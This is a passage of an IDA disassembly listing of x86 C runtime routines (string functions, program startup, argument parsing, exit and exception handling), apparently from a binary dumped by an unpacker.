loc_402783: ; CODE XREF: sub_402720+81�j
mov al, [edx]
test al, al
jz short loc_4027A7
movzx esi, al
mov ecx, esi
push 1
and ecx, edi
pop eax
shl eax, cl
shr esi, 3
mov cl, [ebp+esi+var_20]
test al, cl
jnz short loc_4027A3
inc edx
jmp short loc_402783
; ---------------------------------------------------------------------------
loc_4027A3: ; CODE XREF: sub_402720+7E�j
and byte ptr [edx], 0
inc edx
loc_4027A7: ; CODE XREF: sub_402720+67�j
mov eax, ebx
pop edi
sub eax, edx
pop esi
neg eax
sbb eax, eax
mov dword_406F4C, edx
and eax, ebx
pop ebx
leave
retn
sub_402720 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027C0 proc near ; CODE XREF: sub_401B46+E9�p
; sub_401B46+270�p ...
arg_0 = dword ptr 4
push edi
mov edi, [esp+4+arg_0]
jmp short loc_402831
sub_4027C0 endp
; ---------------------------------------------------------------------------
align 10h
; =============== S U B R O U T I N E =======================================
sub_4027D0 proc near ; CODE XREF: sub_401F2E+14C�p
; sub_401F2E+15B�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
mov ecx, [esp+arg_0]
push edi
test ecx, 3
jz short loc_4027EC
loc_4027DD: ; CODE XREF: sub_4027D0+1A�j
mov al, [ecx]
inc ecx
test al, al
jz short loc_40281F
test ecx, 3
jnz short loc_4027DD
loc_4027EC: ; CODE XREF: sub_4027D0+B�j
; sub_4027D0+32�j ...
mov eax, [ecx]
mov edx, 7EFEFEFFh
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
add ecx, 4
test eax, 81010100h
jz short loc_4027EC
mov eax, [ecx-4]
test al, al
jz short loc_40282E
test ah, ah
jz short loc_402829
test eax, 0FF0000h
jz short loc_402824
test eax, 0FF000000h
jz short loc_40281F
jmp short loc_4027EC
; ---------------------------------------------------------------------------
loc_40281F: ; CODE XREF: sub_4027D0+12�j
; sub_4027D0+4B�j
lea edi, [ecx-1]
jmp short loc_402831
; ---------------------------------------------------------------------------
loc_402824: ; CODE XREF: sub_4027D0+44�j
lea edi, [ecx-2]
jmp short loc_402831
; ---------------------------------------------------------------------------
loc_402829: ; CODE XREF: sub_4027D0+3D�j
lea edi, [ecx-3]
jmp short loc_402831
; ---------------------------------------------------------------------------
loc_40282E: ; CODE XREF: sub_4027D0+39�j
lea edi, [ecx-4]
loc_402831: ; CODE XREF: sub_4027C0+5�j
; sub_4027D0+52�j ...
mov ecx, [esp+4+arg_4]
test ecx, 3
jz short loc_402856
loc_40283D: ; CODE XREF: sub_4027D0+7D�j
mov dl, [ecx]
inc ecx
test dl, dl
jz short loc_4028A8
mov [edi], dl
inc edi
test ecx, 3
jnz short loc_40283D
jmp short loc_402856
; ---------------------------------------------------------------------------
loc_402851: ; CODE XREF: sub_4027D0+9E�j
; sub_4027D0+B8�j
mov [edi], edx
add edi, 4
loc_402856: ; CODE XREF: sub_4027D0+6B�j
; sub_4027D0+7F�j
mov edx, 7EFEFEFFh
mov eax, [ecx]
add edx, eax
xor eax, 0FFFFFFFFh
xor eax, edx
mov edx, [ecx]
add ecx, 4
test eax, 81010100h
jz short loc_402851
test dl, dl
jz short loc_4028A8
test dh, dh
jz short loc_40289F
test edx, 0FF0000h
jz short loc_402892
test edx, 0FF000000h
jz short loc_40288A
jmp short loc_402851
; ---------------------------------------------------------------------------
loc_40288A: ; CODE XREF: sub_4027D0+B6�j
mov [edi], edx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_402892: ; CODE XREF: sub_4027D0+AE�j
mov [edi], dx
mov eax, [esp+4+arg_0]
mov byte ptr [edi+2], 0
pop edi
retn
; ---------------------------------------------------------------------------
loc_40289F: ; CODE XREF: sub_4027D0+A6�j
mov [edi], dx
mov eax, [esp+4+arg_0]
pop edi
retn
; ---------------------------------------------------------------------------
loc_4028A8: ; CODE XREF: sub_4027D0+72�j
; sub_4027D0+A2�j
mov [edi], dl
mov eax, [esp+4+arg_0]
pop edi
retn
sub_4027D0 endp
; =============== S U B R O U T I N E =======================================
sub_4028B0 proc near ; CODE XREF: sub_401E6E+19�p
arg_0 = dword ptr 4
cmp dword_406CFC, 1
jle short loc_4028CA
push 107h
push [esp+4+arg_0]
call sub_402AEC
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
loc_4028CA: ; CODE XREF: sub_4028B0+7�j
mov eax, [esp+arg_0]
mov ecx, off_406AF0
mov ax, [ecx+eax*2]
and eax, 107h
retn
sub_4028B0 endp
; ---------------------------------------------------------------------------
push ebp
mov ebp, esp
push 0FFFFFFFFh
push offset dword_405140
push offset sub_403558
mov eax, large fs:0
push eax
mov large fs:0, esp
sub esp, 58h
push ebx
push esi
push edi
mov [ebp-18h], esp
call dword_4050C4 ; GetVersion
xor edx, edx
mov dl, ah
mov dword_406F74, edx
mov ecx, eax
and ecx, 0FFh
mov dword_406F70, ecx
shl ecx, 8
add ecx, edx
mov dword_406F6C, ecx
shr eax, 10h
mov dword_406F68, eax
xor esi, esi
push esi
call sub_403422
pop ecx
test eax, eax
jnz short loc_40294A
push 1Ch
call sub_4029F9
pop ecx
loc_40294A: ; CODE XREF: .text:00402940�j
mov [ebp-4], esi
call sub_403277
call dword_4050C0 ; GetCommandLineA
mov dword_407478, eax
call sub_403145
mov dword_406F50, eax
call sub_402EF8
call sub_402E3F
call sub_402B61
mov [ebp-30h], esi
lea eax, [ebp-5Ch]
push eax
call dword_4050BC ; GetStartupInfoA
call sub_402DE7
mov [ebp-64h], eax
test byte ptr [ebp-30h], 1
jz short loc_402997
movzx eax, word ptr [ebp-2Ch]
jmp short loc_40299A
; ---------------------------------------------------------------------------
loc_402997: ; CODE XREF: .text:0040298F�j
push 0Ah
pop eax
loc_40299A: ; CODE XREF: .text:00402995�j
push eax
push dword ptr [ebp-64h]
push esi
push esi
call dword_4050B8 ; GetModuleHandleA
push eax
call sub_4020C8
mov [ebp-60h], eax
push eax
call sub_402B8E
mov eax, [ebp-14h]
mov ecx, [eax]
mov ecx, [ecx]
mov [ebp-68h], ecx
push eax
push ecx
call sub_402C63
pop ecx
pop ecx
retn
; ---------------------------------------------------------------------------
mov esp, [ebp-18h]
push dword ptr [ebp-68h]
call sub_402B9F
; =============== S U B R O U T I N E =======================================
sub_4029D4 proc near ; CODE XREF: sub_402E3F+4E�p
; sub_402E3F+7D�p ...
arg_0 = dword ptr 4
cmp dword_406F58, 1
jnz short loc_4029E2
call sub_403630
loc_4029E2: ; CODE XREF: sub_4029D4+7�j
push [esp+arg_0]
call sub_403669
push 0FFh
call off_406AE0
pop ecx
pop ecx
retn
sub_4029D4 endp
; =============== S U B R O U T I N E =======================================
sub_4029F9 proc near ; CODE XREF: .text:00402944�p
arg_0 = dword ptr 4
cmp dword_406F58, 1
jnz short loc_402A07
call sub_403630
loc_402A07: ; CODE XREF: sub_4029F9+7�j
push [esp+arg_0]
call sub_403669
pop ecx
push 0FFh
call dword_4050C8 ; ExitProcess
retn
sub_4029F9 endp
; ---------------------------------------------------------------------------
align 10h
; START OF FUNCTION CHUNK FOR sub_402A36
loc_402A20: ; CODE XREF: sub_402A36+17�j
lea eax, [edx-1]
pop ebx
retn
; END OF FUNCTION CHUNK FOR sub_402A36
; ---------------------------------------------------------------------------
align 10h
xor eax, eax
mov al, [esp+8]
; =============== S U B R O U T I N E =======================================
sub_402A36 proc near ; CODE XREF: sub_4026A0+6E�j
arg_0 = dword ptr 4
; FUNCTION CHUNK AT 00402A20 SIZE 00000005 BYTES
push ebx
mov ebx, eax
shl eax, 8
mov edx, [esp+4+arg_0]
test edx, 3
jz short loc_402A5B
loc_402A48: ; CODE XREF: sub_402A36+23�j
mov cl, [edx]
inc edx
cmp cl, bl
jz short loc_402A20
test cl, cl
jz short loc_402AA4
test edx, 3
jnz short loc_402A48
loc_402A5B: ; CODE XREF: sub_402A36+10�j
or ebx, eax
push edi
mov eax, ebx
shl ebx, 10h
push esi
or ebx, eax
loc_402A66: ; CODE XREF: sub_402A36+5B�j
; sub_402A36+6A�j ...
mov ecx, [edx]
mov edi, 7EFEFEFFh
mov eax, ecx
mov esi, edi
xor ecx, ebx
add esi, eax
add edi, ecx
xor ecx, 0FFFFFFFFh
xor eax, 0FFFFFFFFh
xor ecx, edi
xor eax, esi
add edx, 4
and ecx, 81010100h
jnz short loc_402AA8
and eax, 81010100h
jz short loc_402A66
and eax, 1010100h
jnz short loc_402AA2
and esi, 80000000h
jnz short loc_402A66
loc_402AA2: ; CODE XREF: sub_402A36+62�j
; sub_402A36+7B�j ...
pop esi
pop edi
loc_402AA4: ; CODE XREF: sub_402A36+1B�j
pop ebx
xor eax, eax
retn
; ---------------------------------------------------------------------------
loc_402AA8: ; CODE XREF: sub_402A36+54�j
mov eax, [edx-4]
cmp al, bl
jz short loc_402AE5
test al, al
jz short loc_402AA2
cmp ah, bl
jz short loc_402ADE
test ah, ah
jz short loc_402AA2
shr eax, 10h
cmp al, bl
jz short loc_402AD7
test al, al
jz short loc_402AA2
cmp ah, bl
jz short loc_402AD0
test ah, ah
jz short loc_402AA2
jmp short loc_402A66
; ---------------------------------------------------------------------------
loc_402AD0: ; CODE XREF: sub_402A36+92�j
pop esi
pop edi
lea eax, [edx-1]
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402AD7: ; CODE XREF: sub_402A36+8A�j
lea eax, [edx-2]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402ADE: ; CODE XREF: sub_402A36+7F�j
lea eax, [edx-3]
pop esi
pop edi
pop ebx
retn
; ---------------------------------------------------------------------------
loc_402AE5: ; CODE XREF: sub_402A36+77�j
lea eax, [edx-4]
pop esi
pop edi
pop ebx
retn
sub_402A36 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402AEC proc near ; CODE XREF: sub_4028B0+12�p
var_4 = byte ptr -4
var_3 = byte ptr -3
var_2 = byte ptr -2
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ecx
mov eax, [ebp+arg_0]
lea ecx, [eax+1]
cmp ecx, 100h
ja short loc_402B0A
mov ecx, off_406AF0
movzx eax, word ptr [ecx+eax*2]
jmp short loc_402B5C
; ---------------------------------------------------------------------------
loc_402B0A: ; CODE XREF: sub_402AEC+10�j
mov ecx, eax
push esi
mov esi, off_406AF0
sar ecx, 8
movzx edx, cl
test byte ptr [esi+edx*2+1], 80h
pop esi
jz short loc_402B2F
and [ebp+var_2], 0
mov [ebp+var_4], cl
mov [ebp+var_3], al
push 2
jmp short loc_402B38
; ---------------------------------------------------------------------------
loc_402B2F: ; CODE XREF: sub_402AEC+33�j
and [ebp+var_3], 0
mov [ebp+var_4], al
push 1
loc_402B38: ; CODE XREF: sub_402AEC+41�j
pop eax
lea ecx, [ebp+arg_0+2]
push 1
push 0
push 0
push ecx
push eax
lea eax, [ebp+var_4]
push eax
push 1
call sub_4037BC
add esp, 1Ch
test eax, eax
jnz short loc_402B58
leave
retn
; ---------------------------------------------------------------------------
loc_402B58: ; CODE XREF: sub_402AEC+68�j
movzx eax, word ptr [ebp+arg_0+2]
loc_402B5C: ; CODE XREF: sub_402AEC+1C�j
and eax, [ebp+arg_4]
leave
retn
sub_402AEC endp
; =============== S U B R O U T I N E =======================================
sub_402B61 proc near ; CODE XREF: .text:00402971�p
mov eax, dword_407474
test eax, eax
jz short loc_402B6C
call eax
loc_402B6C: ; CODE XREF: sub_402B61+7�j
push offset dword_406010
push offset dword_406008
call sub_402C49
push offset dword_406004
push offset dword_406000
call sub_402C49
add esp, 10h
retn
sub_402B61 endp
; =============== S U B R O U T I N E =======================================
sub_402B8E proc near ; CODE XREF: .text:004029B0�p
arg_0 = dword ptr 4
push 0
push 0
push [esp+8+arg_0]
call sub_402BB0
add esp, 0Ch
retn
sub_402B8E endp
; =============== S U B R O U T I N E =======================================
sub_402B9F proc near ; CODE XREF: .text:004029CF�p
; sub_4029D4+1C�p
; DATA XREF: ...
arg_0 = dword ptr 4
push 0
push 1
push [esp+8+arg_0]
call sub_402BB0
add esp, 0Ch
retn
sub_402B9F endp
; =============== S U B R O U T I N E =======================================
sub_402BB0 proc near ; CODE XREF: sub_402B8E+8�p
; sub_402B9F+8�p
arg_0 = dword ptr 4
arg_4 = dword ptr 8
arg_8 = dword ptr 0Ch
push edi
push 1
pop edi
cmp dword_406FA4, edi
jnz short loc_402BCD
push [esp+4+arg_0]
call dword_4050D0 ; GetCurrentProcess
push eax
call dword_4050CC ; TerminateProcess
loc_402BCD: ; CODE XREF: sub_402BB0+A�j
cmp [esp+4+arg_4], 0
push ebx
mov ebx, [esp+8+arg_8]
mov dword_406FA0, edi
mov byte_406F9C, bl
jnz short loc_402C21
mov eax, dword_407470
test eax, eax
jz short loc_402C10
mov ecx, dword_40746C
push esi
lea esi, [ecx-4]
cmp esi, eax
jb short loc_402C0F
loc_402BFC: ; CODE XREF: sub_402BB0+5D�j
mov eax, [esi]
test eax, eax
jz short loc_402C04
call eax
loc_402C04: ; CODE XREF: sub_402BB0+50�j
sub esi, 4
cmp esi, dword_407470
jnb short loc_402BFC
loc_402C0F: ; CODE XREF: sub_402BB0+4A�j
pop esi
loc_402C10: ; CODE XREF: sub_402BB0+3C�j
push offset dword_406018
push offset dword_406014
call sub_402C49
pop ecx
pop ecx
loc_402C21: ; CODE XREF: sub_402BB0+33�j
push offset dword_406020
push offset dword_40601C
call sub_402C49
pop ecx
pop ecx
test ebx, ebx
pop ebx
jnz short loc_402C47
push [esp+4+arg_0]
mov dword_406FA4, edi
call dword_4050C8 ; ExitProcess
loc_402C47: ; CODE XREF: sub_402BB0+85�j
pop edi
retn
sub_402BB0 endp
; =============== S U B R O U T I N E =======================================
sub_402C49 proc near ; CODE XREF: sub_402B61+15�p
; sub_402B61+24�p ...
arg_0 = dword ptr 4
arg_4 = dword ptr 8
push esi
mov esi, [esp+4+arg_0]
loc_402C4E: ; CODE XREF: sub_402C49+16�j
cmp esi, [esp+4+arg_4]
jnb short loc_402C61
mov eax, [esi]
test eax, eax
jz short loc_402C5C
call eax
loc_402C5C: ; CODE XREF: sub_402C49+F�j
add esi, 4
jmp short loc_402C4E
; ---------------------------------------------------------------------------
loc_402C61: ; CODE XREF: sub_402C49+9�j
pop esi
retn
sub_402C49 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402C63 proc near ; CODE XREF: .text:004029C1�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
push ebp
mov ebp, esp
push ebx
push [ebp+arg_0]
call sub_402DA4
test eax, eax
pop ecx
jz loc_402D98
mov ebx, [eax+8]
test ebx, ebx
jz loc_402D98
cmp ebx, 5
jnz short loc_402C94
and dword ptr [eax+8], 0
push 1
pop eax
jmp loc_402DA1
; ---------------------------------------------------------------------------
loc_402C94: ; CODE XREF: sub_402C63+23�j
cmp ebx, 1
jz loc_402D93
mov ecx, dword_406FA8
mov [ebp+arg_0], ecx
mov ecx, [ebp+arg_4]
mov dword_406FA8, ecx
mov ecx, [eax+4]
cmp ecx, 8
jnz loc_402D83
mov ecx, dword_406D80
mov edx, dword_406D84
add edx, ecx
push esi
cmp ecx, edx
jge short loc_402CE3
lea esi, [ecx+ecx*2]
sub edx, ecx
lea esi, ds:406D10h[esi*4]
loc_402CDA: ; CODE XREF: sub_402C63+7E�j
and dword ptr [esi], 0
add esi, 0Ch
dec edx
jnz short loc_402CDA
loc_402CE3: ; CODE XREF: sub_402C63+69�j
mov eax, [eax]
mov esi, dword_406D8C
cmp eax, 0C000008Eh
jnz short loc_402CFE
mov dword_406D8C, 83h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402CFE: ; CODE XREF: sub_402C63+8D�j
cmp eax, 0C0000090h
jnz short loc_402D11
mov dword_406D8C, 81h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D11: ; CODE XREF: sub_402C63+A0�j
cmp eax, 0C0000091h
jnz short loc_402D24
mov dword_406D8C, 84h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D24: ; CODE XREF: sub_402C63+B3�j
cmp eax, 0C0000093h
jnz short loc_402D37
mov dword_406D8C, 85h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D37: ; CODE XREF: sub_402C63+C6�j
cmp eax, 0C000008Dh
jnz short loc_402D4A
mov dword_406D8C, 82h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D4A: ; CODE XREF: sub_402C63+D9�j
cmp eax, 0C000008Fh
jnz short loc_402D5D
mov dword_406D8C, 86h
jmp short loc_402D6E
; ---------------------------------------------------------------------------
loc_402D5D: ; CODE XREF: sub_402C63+EC�j
cmp eax, 0C0000092h
jnz short loc_402D6E
mov dword_406D8C, 8Ah
loc_402D6E: ; CODE XREF: sub_402C63+99�j
; sub_402C63+AC�j ...
push dword_406D8C
push 8
call ebx ; wsprintfA
pop ecx
mov dword_406D8C, esi
pop ecx
pop esi
jmp short loc_402D8B
; ---------------------------------------------------------------------------
loc_402D83: ; CODE XREF: sub_402C63+52�j
and dword ptr [eax+8], 0
push ecx
call ebx ; wsprintfA
pop ecx
loc_402D8B: ; CODE XREF: sub_402C63+11E�j
mov eax, [ebp+arg_0]
mov dword_406FA8, eax
loc_402D93: ; CODE XREF: sub_402C63+34�j
or eax, 0FFFFFFFFh
jmp short loc_402DA1
; ---------------------------------------------------------------------------
loc_402D98: ; CODE XREF: sub_402C63+F�j
; sub_402C63+1A�j
push [ebp+arg_4]
call dword_4050D4 ; UnhandledExceptionFilter
loc_402DA1: ; CODE XREF: sub_402C63+2C�j
; sub_402C63+133�j
pop ebx
pop ebp
retn
sub_402C63 endp
; =============== S U B R O U T I N E =======================================
sub_402DA4 proc near ; CODE XREF: sub_402C63+7�p
arg_0 = dword ptr 4
mov edx, [esp+arg_0]
mov ecx, dword_406D88
cmp dword_406D08, edx
push esi
mov eax, offset dword_406D08
jz short loc_402DD1
lea esi, [ecx+ecx*2]
lea esi, ds:406D08h[esi*4]
loc_402DC6: ; CODE XREF: sub_402DA4+2B�j
add eax, 0Ch
cmp eax, esi
jnb short loc_402DD1
cmp [eax], edx
jnz short loc_402DC6
loc_402DD1: ; CODE XREF: sub_402DA4+16�j
; sub_402DA4+27�j
lea ecx, [ecx+ecx*2]
pop esi
lea ecx, ds:406D08h[ecx*4]
cmp eax, ecx
jnb short loc_402DE4
cmp [eax], edx
jz short locret_402DE6
loc_402DE4: ; CODE XREF: sub_402DA4+3A�j
xor eax, eax
locret_402DE6: ; CODE XREF: sub_402DA4+3E�j
retn
sub_402DA4 endp
; =============== S U B R O U T I N E =======================================
sub_402DE7 proc near ; CODE XREF: .text:00402983�p
cmp dword_407468, 0
jnz short loc_402DF5
call sub_403D0B
loc_402DF5: ; CODE XREF: sub_402DE7+7�j
push esi
mov esi, dword_407478
mov al, [esi]
cmp al, 22h
jnz short loc_402E27
loc_402E02: ; CODE XREF: sub_402DE7+33�j
; sub_402DE7+36�j
mov al, [esi+1]
inc esi
cmp al, 22h
jz short loc_402E1F
test al, al
jz short loc_402E1F
movzx eax, al
push eax
call sub_403905
test eax, eax
pop ecx
jz short loc_402E02
inc esi
jmp short loc_402E02
; ---------------------------------------------------------------------------
loc_402E1F: ; CODE XREF: sub_402DE7+21�j
; sub_402DE7+25�j
cmp byte ptr [esi], 22h
jnz short loc_402E31
loc_402E24: ; CODE XREF: sub_402DE7+52�j
inc esi
jmp short loc_402E31
; ---------------------------------------------------------------------------
loc_402E27: ; CODE XREF: sub_402DE7+19�j
cmp al, 20h
jbe short loc_402E31
loc_402E2B: ; CODE XREF: sub_402DE7+48�j
inc esi
cmp byte ptr [esi], 20h
ja short loc_402E2B
loc_402E31: ; CODE XREF: sub_402DE7+3B�j
; sub_402DE7+3E�j ...
mov al, [esi]
test al, al
jz short loc_402E3B
cmp al, 20h
jbe short loc_402E24
loc_402E3B: ; CODE XREF: sub_402DE7+4E�j
mov eax, esi
pop esi
retn
sub_402DE7 endp
; =============== S U B R O U T I N E =======================================
sub_402E3F proc near ; CODE XREF: .text:0040296C�p
push ebx
xor ebx, ebx
cmp dword_407468, ebx
push esi
push edi
jnz short loc_402E51
call sub_403D0B
loc_402E51: ; CODE XREF: sub_402E3F+B�j
mov esi, dword_406F50
xor edi, edi
loc_402E59: ; CODE XREF: sub_402E3F+30�j
mov al, [esi]
cmp al, bl
jz short loc_402E71
cmp al, 3Dh
jz short loc_402E64
inc edi
loc_402E64: ; CODE XREF: sub_402E3F+22�j
push esi
call sub_4022B0
pop ecx
lea esi, [esi+eax+1]
jmp short loc_402E59
; ---------------------------------------------------------------------------
loc_402E71: ; CODE XREF: sub_402E3F+1E�j
lea eax, ds:4[edi*4]
push eax
call sub_403D56
mov esi, eax
pop ecx
cmp esi, ebx
mov dword_406F84, esi
jnz short loc_402E93
push 9
call sub_4029D4
pop ecx
loc_402E93: ; CODE XREF: sub_402E3F+4A�j
mov edi, dword_406F50
cmp [edi], bl
jz short loc_402ED6
push ebp
loc_402E9E: ; CODE XREF: sub_402E3F+94�j
push edi
call sub_4022B0
mov ebp, eax
pop ecx
inc ebp
cmp byte ptr [edi], 3Dh
jz short loc_402ECF
push ebp
call sub_403D56
cmp eax, ebx
pop ecx
mov [esi], eax
jnz short loc_402EC2
push 9
call sub_4029D4
pop ecx
loc_402EC2: ; CODE XREF: sub_402E3F+79�j
push edi
push dword ptr [esi]
call sub_4027C0
pop ecx
add esi, 4
pop ecx
loc_402ECF: ; CODE XREF: sub_402E3F+6C�j
add edi, ebp
cmp [edi], bl
jnz short loc_402E9E
pop ebp
loc_402ED6: ; CODE XREF: sub_402E3F+5C�j
push dword_406F50
call sub_403D27
pop ecx
mov dword_406F50, ebx
mov [esi], ebx
pop edi
pop esi
mov dword_407464, 1
pop ebx
retn
sub_402E3F endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402EF8 proc near ; CODE XREF: .text:00402967�p
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebp
mov ebp, esp
push ecx
push ecx
push ebx
xor ebx, ebx
cmp dword_407468, ebx
push esi
push edi
jnz short loc_402F0F
call sub_403D0B
loc_402F0F: ; CODE XREF: sub_402EF8+10�j
mov esi, offset aCM_unpackerPac ; "C:\\m_unpacker\\packed.exe"
push 104h
push esi
push ebx
call dword_405034 ; GetModuleFileNameA
mov eax, dword_407478
mov off_406F94, esi
mov edi, esi
cmp [eax], bl
jz short loc_402F34
mov edi, eax
loc_402F34: ; CODE XREF: sub_402EF8+38�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
push ebx
push ebx
push edi
call sub_402F91
mov eax, [ebp+var_8]
mov ecx, [ebp+var_4]
lea eax, [eax+ecx*4]
push eax
call sub_403D56
mov esi, eax
add esp, 18h
cmp esi, ebx
jnz short loc_402F64
push 8
call sub_4029D4
pop ecx
loc_402F64: ; CODE XREF: sub_402EF8+62�j
lea eax, [ebp+var_8]
push eax
lea eax, [ebp+var_4]
push eax
mov eax, [ebp+var_4]
lea eax, [esi+eax*4]
push eax
push esi
push edi
call sub_402F91
mov eax, [ebp+var_4]
add esp, 14h
dec eax
mov dword_406F7C, esi
pop edi
pop esi
mov dword_406F78, eax
pop ebx
leave
retn
sub_402EF8 endp
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_402F91 proc near ; CODE XREF: sub_402EF8+47�p
; sub_402EF8+7D�p
arg_0 = dword ptr 8
arg_4 = dword ptr 0Ch
arg_8 = dword ptr 10h
arg_C = dword ptr 14h
arg_10 = dword ptr 18h
push ebp
mov ebp, esp
mov ecx, [ebp+arg_10]
mov eax, [ebp+arg_C]
push ebx
push esi
and dword ptr [ecx], 0
mov esi, [ebp+arg_8]
push edi
mov edi, [ebp+arg_4]
mov dword ptr [eax], 1
mov eax, [ebp+arg_0]
test edi, edi
jz short loc_402FBB
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_402FBB: ; CODE XREF: sub_402F91+20�j
cmp byte ptr [eax], 22h
jnz short loc_403004
loc_402FC0: ; CODE XREF: sub_402F91+58�j
; sub_402F91+5F�j
mov dl, [eax+1]
inc eax
cmp dl, 22h
jz short loc_402FF2
test dl, dl
jz short loc_402FF2
movzx edx, dl
test byte_407241[edx], 4
jz short loc_402FE5
inc dword ptr [ecx]
test esi, esi
jz short loc_402FE5
mov dl, [eax]
mov [esi], dl
inc esi
inc eax
loc_402FE5: ; CODE XREF: sub_402F91+46�j
; sub_402F91+4C�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402FC0
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_402FC0
; ---------------------------------------------------------------------------
loc_402FF2: ; CODE XREF: sub_402F91+36�j
; sub_402F91+3A�j
inc dword ptr [ecx]
test esi, esi
jz short loc_402FFC
and byte ptr [esi], 0
inc esi
loc_402FFC: ; CODE XREF: sub_402F91+65�j
cmp byte ptr [eax], 22h
jnz short loc_403047
inc eax
jmp short loc_403047
; ---------------------------------------------------------------------------
loc_403004: ; CODE XREF: sub_402F91+2D�j
; sub_402F91+A5�j
inc dword ptr [ecx]
test esi, esi
jz short loc_40300F
mov dl, [eax]
mov [esi], dl
inc esi
loc_40300F: ; CODE XREF: sub_402F91+77�j
mov dl, [eax]
inc eax
movzx ebx, dl
test byte_407241[ebx], 4
jz short loc_40302A
inc dword ptr [ecx]
test esi, esi
jz short loc_403029
mov bl, [eax]
mov [esi], bl
inc esi
loc_403029: ; CODE XREF: sub_402F91+91�j
inc eax
loc_40302A: ; CODE XREF: sub_402F91+8B�j
cmp dl, 20h
jz short loc_403038
test dl, dl
jz short loc_40303C
cmp dl, 9
jnz short loc_403004
loc_403038: ; CODE XREF: sub_402F91+9C�j
test dl, dl
jnz short loc_40303F
loc_40303C: ; CODE XREF: sub_402F91+A0�j
dec eax
jmp short loc_403047
; ---------------------------------------------------------------------------
loc_40303F: ; CODE XREF: sub_402F91+A9�j
test esi, esi
jz short loc_403047
and byte ptr [esi-1], 0
loc_403047: ; CODE XREF: sub_402F91+6E�j
; sub_402F91+71�j ...
and [ebp+arg_10], 0
loc_40304B: ; CODE XREF: sub_402F91+19E�j
cmp byte ptr [eax], 0
jz loc_403134
loc_403054: ; CODE XREF: sub_402F91+D0�j
mov dl, [eax]
cmp dl, 20h
jz short loc_403060
cmp dl, 9
jnz short loc_403063
loc_403060: ; CODE XREF: sub_402F91+C8�j
inc eax
jmp short loc_403054
; ---------------------------------------------------------------------------
loc_403063: ; CODE XREF: sub_402F91+CD�j
cmp byte ptr [eax], 0
jz loc_403134
test edi, edi
jz short loc_403078
mov [edi], esi
add edi, 4
mov [ebp+arg_4], edi
loc_403078: ; CODE XREF: sub_402F91+DD�j
mov edx, [ebp+arg_C]
inc dword ptr [edx]
loc_40307D: ; CODE XREF: sub_402F91+18F�j
mov [ebp+arg_0], 1
xor ebx, ebx
loc_403086: ; CODE XREF: sub_402F91+FC�j
cmp byte ptr [eax], 5Ch
jnz short loc_40308F
inc eax
inc ebx
jmp short loc_403086
; ---------------------------------------------------------------------------
loc_40308F: ; CODE XREF: sub_402F91+F8�j
cmp byte ptr [eax], 22h
jnz short loc_4030C0
test bl, 1
jnz short loc_4030BE
xor edi, edi
cmp [ebp+arg_10], edi
jz short loc_4030AD
cmp byte ptr [eax+1], 22h
lea edx, [eax+1]
jnz short loc_4030AD
mov eax, edx
jmp short loc_4030B0
; ---------------------------------------------------------------------------
loc_4030AD: ; CODE XREF: sub_402F91+10D�j
; sub_402F91+116�j
mov [ebp+arg_0], edi
loc_4030B0: ; CODE XREF: sub_402F91+11A�j
mov edi, [ebp+arg_4]
xor edx, edx
cmp [ebp+arg_10], edx
setz dl
mov [ebp+arg_10], edx
loc_4030BE: ; CODE XREF: sub_402F91+106�j
shr ebx, 1
loc_4030C0: ; CODE XREF: sub_402F91+101�j
mov edx, ebx
dec ebx
test edx, edx
jz short loc_4030D5
inc ebx
loc_4030C8: ; CODE XREF: sub_402F91+142�j
test esi, esi
jz short loc_4030D0
mov byte ptr [esi], 5Ch
inc esi
loc_4030D0: ; CODE XREF: sub_402F91+139�j
inc dword ptr [ecx]
dec ebx
jnz short loc_4030C8
loc_4030D5: ; CODE XREF: sub_402F91+134�j
mov dl, [eax]
test dl, dl
jz short loc_403125
cmp [ebp+arg_10], 0
jnz short loc_4030EB
cmp dl, 20h
jz short loc_403125
cmp dl, 9
jz short loc_403125
loc_4030EB: ; CODE XREF: sub_402F91+14E�j
cmp [ebp+arg_0], 0
jz short loc_40311F
test esi, esi
jz short loc_40310E
movzx ebx, dl
test byte_407241[ebx], 4
jz short loc_403107
mov [esi], dl
inc esi
inc eax
inc dword ptr [ecx]
loc_403107: ; CODE XREF: sub_402F91+16E�j
mov dl, [eax]
mov [esi], dl
inc esi
jmp short loc_40311D
; ---------------------------------------------------------------------------
loc_40310E: ; CODE XREF: sub_402F91+162�j
movzx edx, dl
test byte_407241[edx], 4
jz short loc_40311D
inc eax
inc dword ptr [ecx]
loc_40311D: ; CODE XREF: sub_402F91+17B�j
; sub_402F91+187�j
inc dword ptr [ecx]
loc_40311F: ; CODE XREF: sub_402F91+15E�j
inc eax
jmp loc_40307D
; ---------------------------------------------------------------------------
loc_403125: ; CODE XREF: sub_402F91+148�j
; sub_402F91+153�j ...
test esi, esi
jz short loc_40312D
and byte ptr [esi], 0
inc esi
loc_40312D: ; CODE XREF: sub_402F91+196�j
inc dword ptr [ecx]
jmp loc_40304B
; ---------------------------------------------------------------------------
loc_403134: ; CODE XREF: sub_402F91+BD�j
; sub_402F91+D5�j
test edi, edi
jz short loc_40313B
and dword ptr [edi], 0
